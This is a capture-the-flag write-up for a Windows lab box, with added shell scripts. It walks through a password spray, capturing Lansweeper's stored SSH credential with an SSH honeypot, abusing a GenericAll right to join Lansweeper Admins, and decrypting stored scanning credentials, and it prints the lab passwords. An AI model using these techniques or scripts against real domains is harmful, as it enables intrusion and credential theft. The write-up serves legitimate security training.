
Sweep

Sweep is a medium-difficulty Windows box that focuses heavily on Active Directory enumeration and exploiting Lansweeper, an IT asset management and intelligence tool.

Enumeration

Our initial Nmap scan shows the standard Domain Controller ports, including DNS (53), Kerberos (88) and LDAP (389, 636 and the Global Catalog on 3268), confirming the machine's role in the network. It also shows HTTP on ports 81 and 82, both serving a Lansweeper login page.

We begin SMB enumeration by checking for anonymous or guest access. Using netexec, we successfully authenticate as the guest account.

With guest access confirmed, we can cycle RIDs (netexec's --rid-brute), resolving the domain SID plus sequential RIDs into a list of valid domain accounts.

After compiling the discovered users into a list (users.txt), we password spray, trying each username as its own password.

This spray yields a hit: the intern account is using the password intern.
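As an added example (not part of the original writeup), the steps above in shell: parse the RID brute-force output into users.txt, build line-aligned user/password files for a "password equals username" spray, and print the netexec command. The scan output, the SWEEP domain name, the RIDs and the host fields in it are constructed; the spray itself is a network step and is only printed.

```shell
#!/bin/sh
# Added example, not from the writeup: turn netexec's --rid-brute output into
# a user list and the "password equals username" spray files.  The scan
# output below is CONSTRUCTED in the shape netexec prints
# ("<rid>: <DOMAIN>\<name> (SidTypeUser|SidTypeGroup|...)"); the domain
# name SWEEP, the RIDs and the host fields are assumptions.
LC_ALL=C; export LC_ALL

RID_BRUTE_SAMPLE='SMB  10.10.10.10  445  DC  500: SWEEP\Administrator (SidTypeUser)
SMB  10.10.10.10  445  DC  501: SWEEP\Guest (SidTypeUser)
SMB  10.10.10.10  445  DC  512: SWEEP\Domain Admins (SidTypeGroup)
SMB  10.10.10.10  445  DC  1000: SWEEP\DC$ (SidTypeUser)
SMB  10.10.10.10  445  DC  1104: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB  10.10.10.10  445  DC  1105: SWEEP\intern (SidTypeUser)
SMB  10.10.10.10  445  DC  1106: SWEEP\svc_inventory_lnx (SidTypeUser)'

# Keep user objects only, strip the DOMAIN\ prefix, and drop machine
# accounts (names ending in $); reads the scan output from stdin.
extract_users() {
    grep 'SidTypeUser' \
      | sed -e 's/.*\\//' -e 's/ (SidTypeUser).*//' \
      | grep -v '\$$' \
      | sort -u
}

# Candidate pairs for the spray.  Passwords are case sensitive even though
# usernames are not, so also try a lower-case variant when it differs.
spray_pairs() {
    while IFS= read -r u; do
        printf '%s:%s\n' "$u" "$u"
        lc=$(printf '%s' "$u" | tr 'A-Z' 'a-z')
        if [ "$lc" != "$u" ]; then
            printf '%s:%s\n' "$u" "$lc"
        fi
    done
}

# Write users.txt and passwords.txt line-aligned for netexec's --no-bruteforce
# mode, which tries line N of the users only with line N of the passwords
# (a plain -u users.txt -p users.txt would be a full cross product).
write_spray_files() {
    dir=$1
    spray_pairs > "$dir/pairs.txt"
    cut -d: -f1 "$dir/pairs.txt" > "$dir/users.txt"
    cut -d: -f2- "$dir/pairs.txt" > "$dir/passwords.txt"
}

# The spray itself is a network step, so it is only printed here.
# --continue-on-success keeps going past the first valid login.
spray_cmd() {
    printf 'nxc smb %s -u %s/users.txt -p %s/passwords.txt --no-bruteforce --continue-on-success\n' "$1" "$2" "$2"
}

if [ "${1:-}" = "demo" ]; then
    out=$(mktemp -d)
    printf '%s\n' "$RID_BRUTE_SAMPLE" | extract_users | write_spray_files "$out"
    paste -d: "$out/users.txt" "$out/passwords.txt"
    spray_cmd 10.10.10.10 "$out"
fi
```

Run it as `sh spray.sh demo` to see the pairs and the command; in a real engagement feed it the saved netexec output instead of the sample and mind the domain lockout policy before spraying more than one candidate per account.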

Initial Foothold

Armed with the intern:intern credentials, we can log into the Lansweeper dashboard on the web service, which accepts domain logins.

Under Scanning → Scanning credentials we find the credential sets Lansweeper uses to log into the assets it scans. One entry, Inventory Linux, is an SSH username/password credential for Linux scanning; the password is stored but never displayed.

To obtain it in plaintext, we make Lansweeper authenticate to a host we control: under Scanning → Scanning targets we add a new IP range target that covers only our attacking machine and map the Inventory Linux credential to it.

Next, we start an SSH honeypot with sshesame on the attacker machine. It accepts any login and logs the username and password presented; it has to listen on TCP/22, the port the Linux scan connects to by default.

Once we trigger the scan in Lansweeper, the server connects to our honeypot, which records the plaintext password of the domain account svc_inventory_lnx: 0|5m-U6?/uAX.
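As an added example (not part of the original writeup), a shell helper for the capture step: it pulls every accepted user/password pair out of the honeypot log and turns it into the netexec validation command, quoting the password so its special characters survive the shell. The log lines are constructed in the shape sshesame prints, and both that format and the sshesame invocation in the comment are assumptions to check against your version.

```shell
#!/bin/sh
# Added example, not from the writeup: pull the credentials Lansweeper sends
# to the SSH honeypot out of its log and turn them into the netexec check.
# The log lines below are CONSTRUCTED in the shape sshesame prints
# ('authentication for user "U" with password "P" accepted'); that format,
# like the sshesame invocation in the comment, is an assumption to verify
# against your version.
LC_ALL=C; export LC_ALL

# Run the honeypot first (needs root or CAP_NET_BIND_SERVICE for port 22,
# the port the Linux scan connects to), e.g.:
#   sshesame -config sshesame.yaml 2>&1 | tee honeypot.log
# with server.listen_address set to 0.0.0.0:22 in sshesame.yaml (assumed key).

HONEYPOT_LOG='2024/01/01 10:00:00 [10.10.10.10:49812] connection accepted
2024/01/01 10:00:01 [10.10.10.10:49812] authentication for user "svc_inventory_lnx" with password "0|5m-U6?/uAX" accepted
2024/01/01 10:00:05 [10.10.10.10:49813] authentication for user "svc_inventory_lnx" with password "0|5m-U6?/uAX" accepted
2024/01/01 10:00:06 [10.10.10.10:49813] connection closed'

# Extract user:password for every accepted password login, deduplicated;
# Lansweeper retries, so the same pair usually shows up several times.
captured_creds() {
    sed -n 's/.*authentication for user "\([^"]*\)" with password "\([^"]*\)" accepted.*/\1:\2/p' \
      | sort -u
}

# Single-quote a value for a command line so |, ?, / and even embedded
# single quotes survive the shell.
shquote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# One netexec validation command per captured pair (network step, printed
# only).  The password field keeps any colons it contains.
validate_cmds() {
    target=$1
    while IFS=: read -r u p; do
        printf 'nxc smb %s -u %s -p %s\n' "$target" "$(shquote "$u")" "$(shquote "$p")"
    done
}

if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$HONEYPOT_LOG" | captured_creds | validate_cmds 10.10.10.10
fi
```

In practice run `captured_creds < honeypot.log | validate_cmds <dc-ip>` once the scan has fired; if the honeypot shows a connection but no accepted password, the scan is probably using a key rather than a password for that credential, and the honeypot log will show the public key instead.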

Initial Access (User Flag)

We validate the newly acquired credentials with netexec against SMB.

To understand our privileges, we collect BloodHound data for the domain with the new account. BloodHound shows that svc_inventory_lnx is a member of the Lansweeper Discovery group and that this group holds GenericAll over the Lansweeper Admins group, i.e. full control of that object, including the right to change its membership.

We abuse this misconfigured ACE with Samba's net rpc, authenticating as svc_inventory_lnx (the account that holds the right through its group) and adding that same account to the Lansweeper Admins group.

Members of the Lansweeper Admins group get administrative privileges in the dashboard and, on this box, are also allowed to connect over WinRM. Once the command succeeds (the new membership only applies to fresh logons, so a new session is needed), we can WinRM into the machine as svc_inventory_lnx. The user flag can be found in C:\user.txt.
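As an added example (not part of the original writeup), the group-add and the membership check from the attacker's shell. The domain name sweep.vl and the DC host name dc.sweep.vl are assumptions (override them through the environment), the members listing used by the offline check is constructed, and the account added is svc_inventory_lnx, the one the WinRM step relies on.

```shell
#!/bin/sh
# Added example, not from the writeup: abuse the GenericAll right over
# "Lansweeper Admins" from Linux with Samba's net rpc, then confirm the
# membership before trying WinRM.  The domain name (sweep.vl) and DC host
# name (dc.sweep.vl) are ASSUMPTIONS; override them via the environment.
LC_ALL=C; export LC_ALL

DC=${DC:-dc.sweep.vl}
GROUP='Lansweeper Admins'
# Samba's -U takes DOMAIN/user%password; single quotes keep | ? / intact,
# and Samba splits at the first %, so the / inside the password is safe.
CREDS=${CREDS:-'sweep.vl/svc_inventory_lnx%0|5m-U6?/uAX'}

# Add $1 to the group, authenticating as the account that holds GenericAll.
add_member() {
    net rpc group addmem "$GROUP" "$1" -U "$CREDS" -S "$DC"
}

# List the group's current members; net rpc prints one name per line,
# prefixed with the domain (DOMAIN\name), which is assumed here.
list_members() {
    net rpc group members "$GROUP" -U "$CREDS" -S "$DC"
}

# Offline check on a members listing read from stdin: is $1 present?
# Case-insensitive (sAMAccountNames are) and ignores the DOMAIN\ prefix.
is_member() {
    want=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    sed 's/.*\\//' | tr 'A-Z' 'a-z' | grep -qx -- "$want"
}

# CONSTRUCTED listing in the shape list_members returns after the add.
MEMBERS_SAMPLE='SWEEP\svc_inventory_lnx'

if [ "${1:-}" = "run" ]; then        # live mode: needs the DC reachable
    add_member svc_inventory_lnx
    if list_members | is_member svc_inventory_lnx; then
        echo "added; next: evil-winrm -i $DC -u svc_inventory_lnx -p '0|5m-U6?/uAX'"
    else
        echo "membership not visible, check the add" >&2
        exit 1
    fi
fi
```

Run `sh addmem.sh run` against the target; the membership check matters because a successful-looking addmem followed by a failed WinRM logon usually means the group is not the one that grants remote access, not that the credentials are wrong.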

Privilege Escalation (Root Flag)

Lansweeper stores its scanning credentials in its database. The connection string for that database is in the web.config file, but it is encrypted.

Enumerating the Lansweeper installation directory, C:\Program Files (x86)\Lansweeper, we find the web.config with the encrypted connection string in the Website folder and the key material (Encryption.txt) in the Key folder.

Rather than doing this by hand, we can use LansweeperDecrypt.ps1 (or SharpLansweeperDecrypt, its compiled C# equivalent). The script reads the connection string from web.config, decrypts it, queries the database for the stored scanning credentials and decrypts their passwords with the key from Encryption.txt. It has to run on the Lansweeper host as an account that can read both files and reach the database, which our WinRM session as svc_inventory_lnx turns out to provide.

We upload the script through our WinRM session and execute it.

The script decrypts several credentials. Besides the Linux inventory password we already have, it reveals the password of the Windows inventory service account: 4^56!sK&}eA?.

With it we can establish a new WinRM session as that account and read the root flag.
